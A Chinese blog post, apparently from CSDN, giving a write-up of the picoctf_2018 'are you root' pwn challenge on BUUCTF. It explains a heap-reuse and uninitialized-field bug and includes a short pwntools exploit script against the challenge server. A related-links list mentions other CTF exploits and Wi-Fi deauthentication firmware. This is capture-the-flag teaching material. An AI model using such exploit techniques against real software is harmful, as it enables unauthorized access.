[BUUCTF-pwn]——picoctf_2018_are you root

最新推荐文章于 2021-04-11 15:07:14 发布
最新推荐文章于 2021-04-11 15:07:14 发布
阅读量324 收藏
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114585455
版权

[BUUCTF-pwn]——picoctf_2018_are you root

害,有点小烧脑子这道题. 又学习了几个没见过的C语言函数

peak小知识

  • strtok: 第一次使用时候,需要两个参数从第一个参数开始,到第二个参数接断并且返回.
  • strdup: malloc一个参数字符串大小的内存,并且将字符串拷贝进去.

正文

下面进入正文,首先checksec看下
在这里插入图片描述
再去IDA中看下, 好明显的暗示
在这里插入图片描述
紧接着去看看代码, 想要进入give-flag函数, 需要v6 不为0, 同时 *(v6 + 2) == 5
在这里插入图片描述
我们可以看到s和v10的距离是6, login加上一个空格的距离也是6
在这里插入图片描述
所以, v6就是我们后面输入的字符串以及会申请同样大小的内存空间
在这里插入图片描述
我们注意到, *v6会free掉, 如果我们申请的大小为0x10那么放在fastbin里面后,下次我们申请的话,仍然是该空间.
在这里插入图片描述

思路

利用login, 将我们想要的数据排列好, *(v6 + 2), 其实就是v6[2], 四个字节的每个数据
所以字符只需要是’aaaaaaaa’ + p32(0x5) + ‘aaaa’, 因为p32是4个字节刚好, 当然我们也可以是’aaaaaaaa’ + p64(0x5), 因为是小序端存储, 所以四个字节读取的时候也是5
注意大小应该是0x10, 这样最好,可以百分百申请回来
将其释放掉
重新申请回来这样就不是 * v6指向它了而是v6指向它了

exploit

from pwn import *
 
#p = process('./PicoCTF_2018_are_you_root')
p = remote('node3.buuoj.cn',27037)
 

p.sendlineafter('>','login ' + 'a'*0x8 + p32(0x5) + 'aaaa')
 
p.sendlineafter('>','reset')

p.sendlineafter('>','login aa') #这个aa可以随便输入,只要有并且不溢出就好

p.sendlineafter('>','get-flag')
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]PWN——picoctf_2018_are you root(程序逻辑错误)
mcmuyanga的博客
03-17 467
picoctf_2018_are you root 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况
picoctf_2018_are you root
m0_51251108的博客
11-04 179
picoctf_2018_are you root: 参考博客: ha1vk 程序功能到达level5能打出flag,正常运行的话不会让你到达level5 login功能: strdup()在内部调用了malloc()为变量分配内存 返回一个指针,指向为复制字符串分配的空间 可以看到是申请了两个chunk,且我们的level参数就存在后面 直接说解法: 就是输name的我们填满8个a,然后就可以改到level参数 strdup会把name copy下去,包括level参数,我们free它的话,释放到tc
BUUCTF(pwn)picoctf_2018_are you root
半岛铁盒的博客
04-11 165
strdup: malloc一个参数字符串大小的内存,并且将字符串拷贝进去. 思路 利用login, 将我们想要的数据排列好, *(v6 + 2), 其实就是v6[2], 每四个字节就是一个数据 所以字符只需要是 ’aaaaaaaa’ + p64(0x5), 注意大小应该是0x10, 这样最好,可以百分百申请回来 将其释放掉 重新申请回来这样就不是 * v6指向它了而是v6指向它了 from pwn import * p = remote('node3.buuoj.cn',27037) p...
PicoCTF_2018_are_you_root(未初始化验证漏洞)
seaaseesa的博客
04-17 849
PicoCTF_2018_are_you_root 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,只要符合条件就可以显示flag,但是按照正常的逻辑是不能的。 Login时,会malloc一个堆,大小为0x10,并且偏移8处就是auth的验证码。但是login时,并没有初始化*(v7+8)处的值,使得它的值是前面的操作影响。而strdup函数,内部会malloc一个与字符...
[buuctf]picoctf_2018_are you root未初始化漏洞
weixin_46521144的博客
04-02 289
挺神奇的这道题,本地就是打不通,远程可以打通,绝了到底是为什么??? 本来以为这道题有一个指针置0的操作就没有UAF了,看来是我还见得太少,把UAF理解错了(其实我也没开始学堆哈哈哈哈) 参考了网上师傅的解答,发现这里是一个未初始化漏洞。我画个栈帧大家就明白了 先写一下函数长什么样 栈帧长这样 注意到一开始v6是一个二级指针,也就是指向数组的数组 strtok分配的内容是存在*v6里面的,所以上述栈帧应该是对的 那么在用完free之后呢,这里的指针归零是指:不能再用该指针寻
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
picoctf_2018_echooo
doudoudedi
09-23 522
发现是简单的32位格式化字符串但是并且flag存了栈上,直接泄漏就行了,但是内存是小端存储的,所以倒序输出即可 exp: from pwn import * #p=process('./PicoCTF_2018_echooo') p=remote('node3.buuoj.cn',26798) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) p.sendlineafter('> ',p
BUUCTF-PWN刷题记录-6
weixin_44145820的博客
04-14 830
目录picoctf_2018_are you rootciscn_2019_final_2 picoctf_2018_are you root 例行安全检查 菜单如下: 我们需要auth_level等于5才能get flag user结构体如下 struct USER{ char *name; long long auth_level; } 漏洞原理分析: 在login中分配了两次内存...
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值